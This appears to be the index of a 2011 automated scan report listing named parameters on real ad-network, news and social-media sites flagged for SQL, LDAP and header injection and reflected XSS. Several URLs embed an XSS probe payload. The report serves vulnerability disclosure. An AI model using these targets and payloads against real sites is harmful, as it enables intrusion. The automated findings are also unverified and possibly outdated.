XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, 05102011-01

Hoyt LLC Research investigates and reports on security vulnerabilities embedded in Web Applications and Products used in wide-scale deployment.

Report generated by XSS.CX at Tue May 10 12:59:28 CDT 2011.


1. SQL injection

1.1. http://ad.amgdgt.com/ads/ [ID cookie]

1.2. http://ad.doubleclick.net/adi/N3285.casalemedia/B2343920.400 [sz parameter]

1.3. http://ad.doubleclick.net/adi/N5295.134426.GOOGLEDISPLAYNETWOR/B5081081.19 [name of an arbitrarily supplied request parameter]

1.4. http://ad.doubleclick.net/adi/N6543.131803.TURN.COM/B5513576.10 [sz parameter]

1.5. http://ad.doubleclick.net/adi/x1.rtb/casio/cttech [_eo parameter]

1.6. http://ad.doubleclick.net/adi/x1.rtb/casio/cttech [name of an arbitrarily supplied request parameter]

1.7. http://ads2.adbrite.com/v0/ad [zs parameter]

1.8. http://c7.zedo.com/bar/v16-406/c5/jsc/fm.js [FFChanCap cookie]

1.9. http://imp.fetchback.com/serve/fb/imp [name of an arbitrarily supplied request parameter]

1.10. http://map.media6degrees.com/orbserv/hbjs [rdrlst cookie]

1.11. http://map.media6degrees.com/orbserv/hbpix [User-Agent HTTP header]

1.12. http://metrics.philly.com/b/ss/phillycom/1/H.17/s67586282941047 [REST URL parameter 3]

1.13. http://q1.checkm8.com/adam/detected [JE parameter]

1.14. http://q1.checkm8.com/adam/detected [WIDTH parameter]

1.15. http://q1.checkm8.com/adam/detected [cat parameter]

1.16. http://q1.checkm8.com/adam/detected [req parameter]

1.17. http://tag.contextweb.com/TagPublish/getad.aspx [tl parameter]

1.18. http://tag.contextweb.com/TagPublish/getad.aspx [tl parameter]

1.19. http://tag.contextweb.com/TagPublish/getad.aspx [tz parameter]

1.20. http://tag.contextweb.com/TagPublish/getad.aspx [tz parameter]

1.21. http://tag.contextweb.com/TagPublish/getjs.aspx [REST URL parameter 1]

1.22. http://www.facebook.com/plugins/facepile.php [datr cookie]

1.23. http://www.facebook.com/plugins/likebox.php [datr cookie]

1.24. http://www.facebook.com/plugins/recommendations.php [datr cookie]

1.25. http://www.geek.com/wp-content/themes/geek6/favicon.ico [REST URL parameter 2]

1.26. http://www.geek.com/wp-content/themes/geek6/styles/redesign.css [REST URL parameter 3]

1.27. http://www.washingtonpost.com/blogs/right-turn/post/rick-santorum-doesnt-understand-america/2011/03/29/AFHhSbBG_blog.html [REST URL parameter 2]

1.28. http://www.washingtonpost.com/blogs/right-turn/post/rick-santorum-doesnt-understand-america/2011/03/29/AFHhSbBG_blog.html [REST URL parameter 8]

1.29. http://www.washingtonpost.com/blogs/right-turn/post/rick-santorum-doesnt-understand-america/2011/03/29/AFHhSbBG_blog.html [name of an arbitrarily supplied request parameter]

2. LDAP injection

2.1. http://a.tribalfusion.com/j.ad [p parameter]

2.2. http://ar.voicefive.com/bmx3/broker.pli [pid parameter]

2.3. http://data.cmcore.com/imp [ci parameter]

2.4. http://map.media6degrees.com/orbserv/hbjs [vstcnt cookie]

2.5. http://metrics.philly.com/b/ss/phillycom/1/H.17/s67586282941047 [REST URL parameter 1]

2.6. https://secure.smartphoneexperts.com/content/customercare/page-status.htm [REST URL parameter 3]

2.7. http://www.google.com/uds/GnewsSearch [sig parameter]

3. HTTP header injection

3.1. http://ad.doubleclick.net/N6496/adj/gather.com/ [REST URL parameter 1]

3.2. http://ad.doubleclick.net/N6496/adj/gather.com/ [REST URL parameter 2]

3.3. http://ad.doubleclick.net/ad/N3671.277003.NETSHELTER/B5398653.20 [REST URL parameter 1]

3.4. http://ad.doubleclick.net/ad/N4478.netshelter.netOX2611/B5176383.13 [REST URL parameter 1]

3.5. http://ad.doubleclick.net/ad/N5371.131643.MEEBO.COM/B5369958.2 [REST URL parameter 1]

3.6. http://ad.doubleclick.net/ad/huffpost.boomerangpixel/bingmodule [REST URL parameter 1]

3.7. http://ad.doubleclick.net/ad/q1.philly/news [REST URL parameter 1]

3.8. http://ad.doubleclick.net/adi/N1558.CasaleMedia/B4461671.2 [REST URL parameter 1]

3.9. http://ad.doubleclick.net/adi/N3285.casalemedia/B2343920.400 [REST URL parameter 1]

3.10. http://ad.doubleclick.net/adi/N4441.contextweb.com/B5238188.3 [REST URL parameter 1]

3.11. http://ad.doubleclick.net/adi/N6344.126328.SPECIFICMEDIA/B5358490.6 [REST URL parameter 1]

3.12. http://ad.doubleclick.net/adi/N6543.131803.TURN.COM/B5513576.10 [REST URL parameter 1]

3.13. http://ad.doubleclick.net/adi/huffpost.politics/news [REST URL parameter 1]

3.14. http://ad.doubleclick.net/adi/x1.rtb/casio/cttech [REST URL parameter 1]

3.15. http://ad.doubleclick.net/adi/x1.rtb/fingerhut/doubledma/ron/ctest [REST URL parameter 1]

3.16. http://ad.doubleclick.net/adj/N3175.128132.INTERCLICK/B4640114.13 [REST URL parameter 1]

3.17. http://ad.doubleclick.net/adj/N3175.272756.AOL-ADVERTISING2/B4640114.5 [REST URL parameter 1]

3.18. http://ad.doubleclick.net/adj/N5776.126265.CASALEMEDIA/B5120103.7 [REST URL parameter 1]

3.19. http://ad.doubleclick.net/adj/contentnext.ilm/paid [REST URL parameter 1]

3.20. http://ad.doubleclick.net/adj/huffpost.politics/longpost [REST URL parameter 1]

3.21. http://ad.doubleclick.net/adj/huffpost.politics/news [REST URL parameter 1]

3.22. http://ad.doubleclick.net/adj/huffpost.politics/news/curtain [REST URL parameter 1]

3.23. http://ad.doubleclick.net/adj/ns.androidcentral/general/archive [REST URL parameter 1]

3.24. http://ad.doubleclick.net/adj/ph.admin/adsense [REST URL parameter 1]

3.25. http://ad.doubleclick.net/adj/ph.admin/register [REST URL parameter 1]

3.26. http://ad.doubleclick.net/adj/ph.mobile/adsense [REST URL parameter 1]

3.27. http://ad.doubleclick.net/adj/ph.news/adsense [REST URL parameter 1]

3.28. http://ad.doubleclick.net/adj/ph.news/nation_world [REST URL parameter 1]

3.29. http://ad.doubleclick.net/adj/q1.philly/news [REST URL parameter 1]

3.30. http://ad.doubleclick.net/adj/zdgeek.dart/geek-cetera [REST URL parameter 1]

3.31. http://ad.doubleclick.net/pfadx/philly_cim/ [dcove parameter]

3.32. http://ad.doubleclick.net/pfadx/philly_cim/ [name of an arbitrarily supplied request parameter]

3.33. http://ad.doubleclick.net/pfadx/philly_cim/ [secure parameter]

3.34. http://amch.questionmarket.com/adscgen/sta.php [code parameter]

3.35. http://amch.questionmarket.com/adscgen/sta.php [site parameter]

3.36. http://bidder.mathtag.com/iframe/notify [exch parameter]

3.37. http://bidder.mathtag.com/notify [exch parameter]

3.38. http://bs.serving-sys.com/BurstingPipe/adServer.bs [flv parameter]

3.39. http://bs.serving-sys.com/BurstingPipe/adServer.bs [res parameter]

3.40. http://bs.serving-sys.com/BurstingPipe/adServer.bs [wmpv parameter]

3.41. http://c7.zedo.com/bar/v16-406/c5/jsc/fmr.js [$ parameter]

3.42. http://c7.zedo.com/utils/ecSet.js [v parameter]

3.43. http://d.xp1.ru4.com/activity [redirect parameter]

3.44. http://politics.gather.com/js/commenting.js [REST URL parameter 2]

3.45. http://politics.gather.com/js/siteReport.js.jspf [REST URL parameter 2]

3.46. http://politics.gather.com/viewArticle.action [REST URL parameter 1]

3.47. http://tacoda.at.atwola.com/rtx/r.js [N cookie]

3.48. http://tacoda.at.atwola.com/rtx/r.js [si parameter]

4. Cross-site scripting (reflected)

4.1. http://a.collective-media.net/ad/q1.philly/news [REST URL parameter 1]

4.2. http://a.collective-media.net/adj/idgt.slashgear/article_above [REST URL parameter 2]

4.3. http://a.collective-media.net/adj/idgt.slashgear/article_above [REST URL parameter 3]

4.4. http://a.collective-media.net/adj/idgt.slashgear/article_above [name of an arbitrarily supplied request parameter]

4.5. http://a.collective-media.net/adj/idgt.slashgear/article_above [sec parameter]

4.6. http://a.collective-media.net/adj/ns.androidcentral/general [REST URL parameter 2]

4.7. http://a.collective-media.net/adj/ns.androidcentral/general [REST URL parameter 3]

4.8. http://a.collective-media.net/adj/ns.androidcentral/general [name of an arbitrarily supplied request parameter]

4.9. http://a.collective-media.net/adj/ns.androidcentral/general [ppos parameter]

4.10. http://a.collective-media.net/adj/ns.androidcentral/general/archive [REST URL parameter 2]

4.11. http://a.collective-media.net/adj/ns.androidcentral/general/archive [REST URL parameter 3]

4.12. http://a.collective-media.net/adj/ns.androidcentral/general/archive [REST URL parameter 4]

4.13. http://a.collective-media.net/adj/ns.androidcentral/general/archive [name of an arbitrarily supplied request parameter]

4.14. http://a.collective-media.net/adj/ns.androidcentral/general/archive [ppos parameter]

4.15. http://a.collective-media.net/adj/ns.knowyourmobile/general [REST URL parameter 2]

4.16. http://a.collective-media.net/adj/ns.knowyourmobile/general [REST URL parameter 3]

4.17. http://a.collective-media.net/adj/ns.knowyourmobile/general [name of an arbitrarily supplied request parameter]

4.18. http://a.collective-media.net/adj/ns.knowyourmobile/general [ppos parameter]

4.19. http://a.collective-media.net/adj/ns.slashgear/general [REST URL parameter 2]

4.20. http://a.collective-media.net/adj/ns.slashgear/general [REST URL parameter 3]

4.21. http://a.collective-media.net/adj/ns.slashgear/general [name of an arbitrarily supplied request parameter]

4.22. http://a.collective-media.net/adj/ns.slashgear/general [ppos parameter]

4.23. http://a.collective-media.net/adj/q1.philly/news [REST URL parameter 2]

4.24. http://a.collective-media.net/adj/q1.philly/news [REST URL parameter 3]

4.25. http://a.collective-media.net/adj/q1.philly/news [name of an arbitrarily supplied request parameter]

4.26. http://a.collective-media.net/adj/q1.philly/news [sz parameter]

4.27. http://a.collective-media.net/cmadj/idgt.slashgear/article_above [REST URL parameter 1]

4.28. http://a.collective-media.net/cmadj/idgt.slashgear/article_above [REST URL parameter 2]

4.29. http://a.collective-media.net/cmadj/idgt.slashgear/article_above [REST URL parameter 3]

4.30. http://a.collective-media.net/cmadj/idgt.slashgear/article_above [sec parameter]

4.31. http://a.collective-media.net/cmadj/ns.androidcentral/general [REST URL parameter 1]

4.32. http://a.collective-media.net/cmadj/ns.androidcentral/general [REST URL parameter 2]

4.33. http://a.collective-media.net/cmadj/ns.androidcentral/general [REST URL parameter 3]

4.34. http://a.collective-media.net/cmadj/ns.androidcentral/general [ppos parameter]

4.35. http://a.collective-media.net/cmadj/ns.androidcentral/general/archive [REST URL parameter 1]

4.36. http://a.collective-media.net/cmadj/ns.androidcentral/general/archive [REST URL parameter 2]

4.37. http://a.collective-media.net/cmadj/ns.androidcentral/general/archive [REST URL parameter 3]

4.38. http://a.collective-media.net/cmadj/ns.androidcentral/general/archive [REST URL parameter 4]

4.39. http://a.collective-media.net/cmadj/ns.androidcentral/general/archive [ppos parameter]

4.40. http://a.collective-media.net/cmadj/ns.knowyourmobile/general [REST URL parameter 1]

4.41. http://a.collective-media.net/cmadj/ns.knowyourmobile/general [REST URL parameter 2]

4.42. http://a.collective-media.net/cmadj/ns.knowyourmobile/general [REST URL parameter 3]

4.43. http://a.collective-media.net/cmadj/ns.knowyourmobile/general [ppos parameter]

4.44. http://a.collective-media.net/cmadj/ns.slashgear/general [REST URL parameter 1]

4.45. http://a.collective-media.net/cmadj/ns.slashgear/general [REST URL parameter 2]

4.46. http://a.collective-media.net/cmadj/ns.slashgear/general [REST URL parameter 3]

4.47. http://a.collective-media.net/cmadj/ns.slashgear/general [ppos parameter]

4.48. http://a.collective-media.net/cmadj/q1.philly/news [REST URL parameter 1]

4.49. http://a.collective-media.net/cmadj/q1.philly/news [REST URL parameter 2]

4.50. http://a.collective-media.net/cmadj/q1.philly/news [REST URL parameter 3]

4.51. http://a.collective-media.net/cmadj/q1.philly/news [sz parameter]

4.52. http://ad.bnmla.com/serve [cid parameter]

4.53. http://ad.bnmla.com/serve [click parameter]

4.54. http://ad.bnmla.com/serve [click parameter]

4.55. http://ad.bnmla.com/serve [pid parameter]

4.56. http://ad.bnmla.com/serve [zid parameter]

4.57. http://ad.doubleclick.net/adi/N5295.134426.GOOGLEDISPLAYNETWOR/B5081081.19 [adurl parameter]

4.58. http://ad.doubleclick.net/adi/N5295.134426.GOOGLEDISPLAYNETWOR/B5081081.19 [ai parameter]

4.59. http://ad.doubleclick.net/adi/N5295.134426.GOOGLEDISPLAYNETWOR/B5081081.19 [client parameter]

4.60. http://ad.doubleclick.net/adi/N5295.134426.GOOGLEDISPLAYNETWOR/B5081081.19 [client parameter]

4.61. http://ad.doubleclick.net/adi/N5295.134426.GOOGLEDISPLAYNETWOR/B5081081.19 [num parameter]

4.62. http://ad.doubleclick.net/adi/N5295.134426.GOOGLEDISPLAYNETWOR/B5081081.19 [sig parameter]

4.63. http://ad.doubleclick.net/adi/N5295.134426.GOOGLEDISPLAYNETWOR/B5081081.19 [sz parameter]

4.64. http://ad.doubleclick.net/adi/N5371.media6/B5451956.2 [sz parameter]

4.65. http://ad.doubleclick.net/adi/x1.rtb/casio/cttech [_a parameter]

4.66. http://ad.doubleclick.net/adi/x1.rtb/casio/cttech [_d parameter]

4.67. http://ad.doubleclick.net/adi/x1.rtb/casio/cttech [_eo parameter]

4.68. http://ad.doubleclick.net/adi/x1.rtb/casio/cttech [_et parameter]

4.69. http://ad.doubleclick.net/adi/x1.rtb/casio/cttech [_o parameter]

4.70. http://ad.doubleclick.net/adi/x1.rtb/casio/cttech [_pm parameter]

4.71. http://ad.doubleclick.net/adi/x1.rtb/casio/cttech [_pn parameter]

4.72. http://ad.doubleclick.net/adi/x1.rtb/casio/cttech [_s parameter]

4.73. http://ad.doubleclick.net/adi/x1.rtb/casio/cttech [redirect parameter]

4.74. http://ad.doubleclick.net/adi/x1.rtb/casio/cttech [sz parameter]

4.75. http://ad.doubleclick.net/adi/x1.rtb/fingerhut/doubledma/ron/ctest [_a parameter]

4.76. http://ad.doubleclick.net/adi/x1.rtb/fingerhut/doubledma/ron/ctest [_d parameter]

4.77. http://ad.doubleclick.net/adi/x1.rtb/fingerhut/doubledma/ron/ctest [_eo parameter]

4.78. http://ad.doubleclick.net/adi/x1.rtb/fingerhut/doubledma/ron/ctest [_et parameter]

4.79. http://ad.doubleclick.net/adi/x1.rtb/fingerhut/doubledma/ron/ctest [_o parameter]

4.80. http://ad.doubleclick.net/adi/x1.rtb/fingerhut/doubledma/ron/ctest [_pm parameter]

4.81. http://ad.doubleclick.net/adi/x1.rtb/fingerhut/doubledma/ron/ctest [_pn parameter]

4.82. http://ad.doubleclick.net/adi/x1.rtb/fingerhut/doubledma/ron/ctest [_s parameter]

4.83. http://ad.doubleclick.net/adi/x1.rtb/fingerhut/doubledma/ron/ctest [redirect parameter]

4.84. http://ad.doubleclick.net/adi/x1.rtb/fingerhut/doubledma/ron/ctest [sz parameter]

4.85. http://ad.doubleclick.net/adj/N4568.ADCONION/B5119479.6 [_ct parameter]

4.86. http://ad.doubleclick.net/adj/N4568.ADCONION/B5119479.6 [_ct parameter]

4.87. http://ad.doubleclick.net/adj/N4568.ADCONION/B5119479.6 [action parameter]

4.88. http://ad.doubleclick.net/adj/N4568.ADCONION/B5119479.6 [action parameter]

4.89. http://ad.doubleclick.net/adj/N4568.ADCONION/B5119479.6 [adid parameter]

4.90. http://ad.doubleclick.net/adj/N4568.ADCONION/B5119479.6 [adid parameter]

4.91. http://ad.doubleclick.net/adj/N4568.ADCONION/B5119479.6 [publisherid parameter]

4.92. http://ad.doubleclick.net/adj/N4568.ADCONION/B5119479.6 [publisherid parameter]

4.93. http://ad.doubleclick.net/adj/N4568.ADCONION/B5119479.6 [sz parameter]

4.94. http://ad.doubleclick.net/adj/N4568.ADCONION/B5119479.6 [sz parameter]

4.95. http://ad.media6degrees.com/adserv/cs [name of an arbitrarily supplied request parameter]

4.96. http://ad.media6degrees.com/adserv/cs [tId parameter]

4.97. http://ad.media6degrees.com/adserv/csst [adType parameter]

4.98. http://ad.media6degrees.com/adserv/csst [adType parameter]

4.99. http://ad.media6degrees.com/adserv/csst [adurl parameter]

4.100. http://ad.media6degrees.com/adserv/csst [adurl parameter]

4.101. http://ad.media6degrees.com/adserv/csst [ai parameter]

4.102. http://ad.media6degrees.com/adserv/csst [ai parameter]

4.103. http://ad.media6degrees.com/adserv/csst [client parameter]

4.104. http://ad.media6degrees.com/adserv/csst [client parameter]

4.105. http://ad.media6degrees.com/adserv/csst [num parameter]

4.106. http://ad.media6degrees.com/adserv/csst [num parameter]

4.107. http://ad.media6degrees.com/adserv/csst [sig parameter]

4.108. http://ad.media6degrees.com/adserv/csst [sig parameter]

4.109. http://ad.turn.com/server/pixel.htm [fpid parameter]

4.110. http://ad.yieldmanager.com/st [name of an arbitrarily supplied request parameter]

4.111. http://ad.yieldmanager.com/st [name of an arbitrarily supplied request parameter]

4.112. http://admeld-match.dotomi.com/admeld/match [admeld_adprovider_id parameter]

4.113. http://admeld-match.dotomi.com/admeld/match [admeld_callback parameter]

4.114. http://admeld.lucidmedia.com/clicksense/admeld/match [admeld_adprovider_id parameter]

4.115. http://admeld.lucidmedia.com/clicksense/admeld/match [admeld_callback parameter]

4.116. http://ads.adbrite.com/adserver/vdi/684339 [REST URL parameter 3]

4.117. http://ads.adbrite.com/adserver/vdi/742697 [REST URL parameter 3]

4.118. http://ads.adbrite.com/adserver/vdi/762701 [REST URL parameter 3]

4.119. http://ads.adsonar.com/adserving/getAds.jsp [pid parameter]

4.120. http://ads.adsonar.com/adserving/getAds.jsp [placementId parameter]

4.121. http://ads.adsonar.com/adserving/getAds.jsp [ps parameter]

4.122. http://ads.specificmedia.com/serve/v=5 [name of an arbitrarily supplied request parameter]

4.123. http://ads.trove.com/RevenuePlatform/ad/pong [&callback parameter]

4.124. http://ads.trove.com/RevenuePlatform/ad/pong [ads%5Brev_ad1%5D%5Bfinder%5D parameter]

4.125. http://ads.trove.com/RevenuePlatform/ad/pong [ads%5Brev_ad2%5D%5Bfinder%5D parameter]

4.126. http://ads.trove.com/RevenuePlatform/ad/pong [url parameter]

4.127. http://ads.tw.adsonar.com/adserving/getAds.jsp [pid parameter]

4.128. http://ads.tw.adsonar.com/adserving/getAds.jsp [placementId parameter]

4.129. http://ads.tw.adsonar.com/adserving/getAds.jsp [ps parameter]

4.130. http://adsfac.us/ag.asp [cc parameter]

4.131. http://api.bizographics.com/v1/profile.redirect [api_key parameter]

4.132. http://api.bizographics.com/v1/profile.redirect [callback_url parameter]

4.133. http://ar.voicefive.com/b/rc.pli [func parameter]

4.134. http://b.scorecardresearch.com/beacon.js [c1 parameter]

4.135. http://b.scorecardresearch.com/beacon.js [c10 parameter]

4.136. http://b.scorecardresearch.com/beacon.js [c15 parameter]

4.137. http://b.scorecardresearch.com/beacon.js [c2 parameter]

4.138. http://b.scorecardresearch.com/beacon.js [c3 parameter]

4.139. http://b.scorecardresearch.com/beacon.js [c4 parameter]

4.140. http://b.scorecardresearch.com/beacon.js [c5 parameter]

4.141. http://b.scorecardresearch.com/beacon.js [c6 parameter]

4.142. http://bid.openx.net/json [c parameter]

4.143. http://c7.zedo.com/bar/v16-406/c5/jsc/fm.js [$ parameter]

4.144. http://c7.zedo.com/bar/v16-406/c5/jsc/fm.js [$ parameter]

4.145. http://c7.zedo.com/bar/v16-406/c5/jsc/fm.js [q parameter]

4.146. http://c7.zedo.com/bar/v16-406/c5/jsc/fm.js [q parameter]

4.147. http://c7.zedo.com/bar/v16-406/c5/jsc/fmr.js [$ parameter]

4.148. http://c7.zedo.com/bar/v16-406/c5/jsc/fmr.js [$ parameter]

4.149. http://c7.zedo.com/bar/v16-406/c5/jsc/fmr.js [q parameter]

4.150. http://c7.zedo.com/bar/v16-406/c5/jsc/fmr.js [q parameter]

4.151. http://cdn.shoutlet.com/service/shoutletshare/worker [loc parameter]

4.152. http://cdn4.eyewonder.com/cm/js/10295-119241-10420-6 [mpt parameter]

4.153. http://cdn4.eyewonder.com/cm/js/10295-119241-10420-6 [mpvc parameter]

4.154. http://cdn4.eyewonder.com/content/0/10295/119241/NetShelternet-728-90-ATM_COVERAGE_728x90_v1_r1-Banner-1438824.js [mpck parameter]

4.155. http://cdn4.eyewonder.com/content/0/10295/119241/NetShelternet-728-90-ATM_COVERAGE_728x90_v1_r1-Banner-1438824.js [mpvc parameter]

4.156. http://choices.truste.com/ca [c parameter]

4.157. http://choices.truste.com/ca [h parameter]

4.158. http://choices.truste.com/ca [plc parameter]

4.159. http://choices.truste.com/ca [w parameter]

4.160. http://choices.truste.com/ca [zi parameter]

4.161. http://d.tradex.openx.com/afr.php [cb parameter]

4.162. http://d.tradex.openx.com/afr.php [loc parameter]

4.163. http://d.tradex.openx.com/afr.php [name of an arbitrarily supplied request parameter]

4.164. http://d.tradex.openx.com/afr.php [zoneid parameter]

4.165. http://delivery.uat.247realmedia.com/RealMedia/ads/adstream_sx.ads/zama/728x90 [REST URL parameter 4]

4.166. http://delivery.uat.247realmedia.com/RealMedia/ads/adstream_sx.ads/zama/728x90 [REST URL parameter 5]

4.167. http://digg.com/tools/services [REST URL parameter 1]

4.168. http://digg.com/tools/services [REST URL parameter 2]

4.169. http://digg.com/tools/services [callback parameter]

4.170. http://digg.com/tools/services [name of an arbitrarily supplied request parameter]

4.171. http://ds.addthis.com/red/psi/sites/store.androidcentral.com/p.json [callback parameter]

4.172. http://echoapi.washingtonpost.com/v1/count [q parameter]

4.173. http://echoapi.washingtonpost.com/v1/search [q parameter]

4.174. http://event.adxpose.com/event.flow [uid parameter]

4.175. http://fw.adsafeprotected.com/rjss/bs.serving-sys.com/9349/83990/BurstingPipe/adServer.bs [PluID parameter]

4.176. http://fw.adsafeprotected.com/rjss/bs.serving-sys.com/9349/83990/BurstingPipe/adServer.bs [REST URL parameter 2]

4.177. http://fw.adsafeprotected.com/rjss/bs.serving-sys.com/9349/83990/BurstingPipe/adServer.bs [REST URL parameter 3]

4.178. http://fw.adsafeprotected.com/rjss/bs.serving-sys.com/9349/83990/BurstingPipe/adServer.bs [REST URL parameter 4]

4.179. http://fw.adsafeprotected.com/rjss/bs.serving-sys.com/9349/83990/BurstingPipe/adServer.bs [REST URL parameter 5]

4.180. http://fw.adsafeprotected.com/rjss/bs.serving-sys.com/9349/83990/BurstingPipe/adServer.bs [REST URL parameter 6]

4.181. http://fw.adsafeprotected.com/rjss/bs.serving-sys.com/9349/83990/BurstingPipe/adServer.bs [c parameter]

4.182. http://fw.adsafeprotected.com/rjss/bs.serving-sys.com/9349/83990/BurstingPipe/adServer.bs [cn parameter]

4.183. http://fw.adsafeprotected.com/rjss/bs.serving-sys.com/9349/83990/BurstingPipe/adServer.bs [h parameter]

4.184. http://fw.adsafeprotected.com/rjss/bs.serving-sys.com/9349/83990/BurstingPipe/adServer.bs [name of an arbitrarily supplied request parameter]

4.185. http://fw.adsafeprotected.com/rjss/bs.serving-sys.com/9349/83990/BurstingPipe/adServer.bs [ncu parameter]

4.186. http://fw.adsafeprotected.com/rjss/bs.serving-sys.com/9349/83990/BurstingPipe/adServer.bs [ord parameter]

4.187. http://fw.adsafeprotected.com/rjss/bs.serving-sys.com/9349/83990/BurstingPipe/adServer.bs [pli parameter]

4.188. http://fw.adsafeprotected.com/rjss/bs.serving-sys.com/9349/83990/BurstingPipe/adServer.bs [ucm parameter]

4.189. http://fw.adsafeprotected.com/rjss/bs.serving-sys.com/9349/83990/BurstingPipe/adServer.bs [w parameter]

4.190. http://gather.us.intellitxt.com/intellitxt/front.asp [name of an arbitrarily supplied request parameter]

4.191. http://geek.us.intellitxt.com/al.asp [jscallback parameter]

4.192. http://geek.us.intellitxt.com/iframescript.jsp [src parameter]

4.193. http://geek.us.intellitxt.com/intellitxt/front.asp [name of an arbitrarily supplied request parameter]

4.194. http://geek.us.intellitxt.com/v4/init [jscallback parameter]

4.195. http://geek.us.intellitxt.com/v4/init [name of an arbitrarily supplied request parameter]

4.196. http://ib.adnxs.com/ab [click parameter]

4.197. http://ib.adnxs.com/ab [cnd parameter]

4.198. http://ib.adnxs.com/ab [custom_macro parameter]

4.199. http://ib.adnxs.com/ab [pixel parameter]

4.200. http://ib.adnxs.com/if [cnd parameter]

4.201. http://id.expressnightout.com/identity/public/visitor.json [jsonp_callback parameter]

4.202. http://id.slate.com/identity/public/visitor.json [jsonp_callback parameter]

4.203. http://id.theroot.com/identity/public/visitor.json [jsonp_callback parameter]

4.204. http://id.trove.com/identity/public/visitor.json [jsonp_callback parameter]

4.205. http://id.washingtonpost.com/identity/public/visitor/create [jsonp_callback parameter]

4.206. http://id.washingtonpost.com/identity/public/visitor/instance_datum.json [attributeValue parameter]

4.207. http://id.washingtonpost.com/identity/public/visitor/instance_datum.json [jsonp_callback parameter]

4.208. http://id.washingtonpost.com/identity/public/visitor/ip_address.json [jsonp_callback parameter]

4.209. http://image3.pubmatic.com/AdServer/UPug [pageURL parameter]

4.210. http://image3.pubmatic.com/AdServer/UPug [ran parameter]

4.211. http://img.mediaplex.com/content/0/13305/124472/Evb_OpportMortgage_Grow_728x90.html [mpck parameter]

4.212. http://img.mediaplex.com/content/0/13305/124472/Evb_OpportMortgage_Grow_728x90.html [mpck parameter]

4.213. http://img.mediaplex.com/content/0/13305/124472/Evb_OpportMortgage_Grow_728x90.html [mpvc parameter]

4.214. http://img.mediaplex.com/content/0/13305/124472/Evb_OpportMortgage_Grow_728x90.html [mpvc parameter]

4.215. http://imp.fetchback.com/serve/fb/adtag.js [clicktrack parameter]

4.216. http://imp.fetchback.com/serve/fb/adtag.js [name of an arbitrarily supplied request parameter]

4.217. http://imp.fetchback.com/serve/fb/adtag.js [type parameter]

4.218. http://js.revsci.net/gateway/gw.js [csid parameter]

4.219. http://knowyourmobile.uk.intellitxt.com/al.asp [jscallback parameter]

4.220. http://knowyourmobile.uk.intellitxt.com/intellitxt/front.asp [name of an arbitrarily supplied request parameter]

4.221. http://knowyourmobile.uk.intellitxt.com/v4/init [jscallback parameter]

4.222. http://knowyourmobile.uk.intellitxt.com/v4/init [name of an arbitrarily supplied request parameter]

4.223. http://media3.washingtonpost.com/wpost/js/combo [context parameter]

4.224. http://mm.chitika.net/minimall [callback parameter]

4.225. http://pglb.buzzfed.com/10032/5aa834d4bb2efeab1df676685da0518c [callback parameter]

4.226. http://r.turn.com/server/pixel.htm [fpid parameter]

4.227. http://r.turn.com/server/pixel.htm [sp parameter]

4.228. http://s26.sitemeter.com/js/counter.asp [site parameter]

4.229. http://s26.sitemeter.com/js/counter.js [site parameter]

4.230. http://samsungsmarttvs.netshelter.net/fixed_placement.js.php [name of an arbitrarily supplied request parameter]

4.231. http://samsungsmarttvs.netshelter.net/fixed_placement.js.php [publisher parameter]

4.232. http://samsungsmarttvs.netshelter.net/video_fixed_placement.js.php [name of an arbitrarily supplied request parameter]

4.233. http://samsungsmarttvs.netshelter.net/video_fixed_placement.js.php [publisher parameter]

4.234. https://secure.smartphoneexperts.com/content/customercare/page-status.htm [REST URL parameter 2]

4.235. https://secure.smartphoneexperts.com/content/customercare/page-status.htm [REST URL parameter 2]

4.236. https://secure.smartphoneexperts.com/content/customercare/page-status.htm [REST URL parameter 3]

4.237. https://secure.smartphoneexperts.com/content/customercare/page-status.htm [REST URL parameter 3]

4.238. https://secure.smartphoneexperts.com/content/customercare6eabd%22-alert(1)-%222ec977d129/images/androidcentral/ab_test_11/ac_hero_bg2.jpg [REST URL parameter 2]

4.239. https://secure.smartphoneexperts.com/content/customercare6eabd%22-alert(1)-%222ec977d129/images/androidcentral/ab_test_11/ac_hero_bg2.jpg [REST URL parameter 3]

4.240. https://secure.smartphoneexperts.com/content/customercare6eabd%22-alert(1)-%222ec977d129/images/androidcentral/ab_test_11/ac_hero_bg2.jpg [REST URL parameter 4]

4.241. https://secure.smartphoneexperts.com/content/customercare6eabd%22-alert(1)-%222ec977d129/images/androidcentral/ab_test_11/ac_hero_bg2.jpg [REST URL parameter 5]

4.242. http://seg.sharethis.com/partners.php [partner parameter]

4.243. http://slashphone.us.intellitxt.com/al.asp [jscallback parameter]

4.244. http://slashphone.us.intellitxt.com/intellitxt/front.asp [name of an arbitrarily supplied request parameter]

4.245. http://slashphone.us.intellitxt.com/v4/init [jscallback parameter]

4.246. http://slashphone.us.intellitxt.com/v4/init [name of an arbitrarily supplied request parameter]

4.247. http://store.androidcentral.com/belkin-headphone-splitter-y-adapter/11A75A6767.htm [REST URL parameter 2]

4.248. http://store.androidcentral.com/cart.htm [REST URL parameter 1]

4.249. http://store.androidcentral.com/content/customercare/index.htm [REST URL parameter 2]

4.250. http://store.androidcentral.com/content/customercare/index.htm [REST URL parameter 3]

4.251. http://store.androidcentral.com/content/customercare/page-shipping.htm [REST URL parameter 2]

4.252. http://store.androidcentral.com/content/customercare/page-shipping.htm [REST URL parameter 3]

4.253. http://store.androidcentral.com/external_marketing/js_a_v1.php [width parameter]

4.254. http://store.androidcentral.com/jabra-bt2080-bluetooth-headset/9A32A5717.htm [REST URL parameter 2]

4.255. http://tag.admeld.com/ad/json [callback parameter]

4.256. http://tag.admeld.com/ad/json [container parameter]

4.257. http://tag.admeld.com/ad/json [placement parameter]

4.258. http://tag.admeld.com/ad/json [site_id parameter]

4.259. http://tag.contextweb.com/TagPublish/getjs.aspx [action parameter]

4.260. http://tag.contextweb.com/TagPublish/getjs.aspx [cwadformat parameter]

4.261. http://tag.contextweb.com/TagPublish/getjs.aspx [cwheight parameter]

4.262. http://tag.contextweb.com/TagPublish/getjs.aspx [cwpid parameter]

4.263. http://tag.contextweb.com/TagPublish/getjs.aspx [cwpnet parameter]

4.264. http://tag.contextweb.com/TagPublish/getjs.aspx [cwrun parameter]

4.265. http://tag.contextweb.com/TagPublish/getjs.aspx [cwtagid parameter]

4.266. http://tag.contextweb.com/TagPublish/getjs.aspx [cwwidth parameter]

4.267. http://tap.rubiconproject.com/partner/agent/rubicon/insight.js [&ak parameter]

4.268. http://tap.rubiconproject.com/partner/agent/rubicon/insight.js [as parameter]

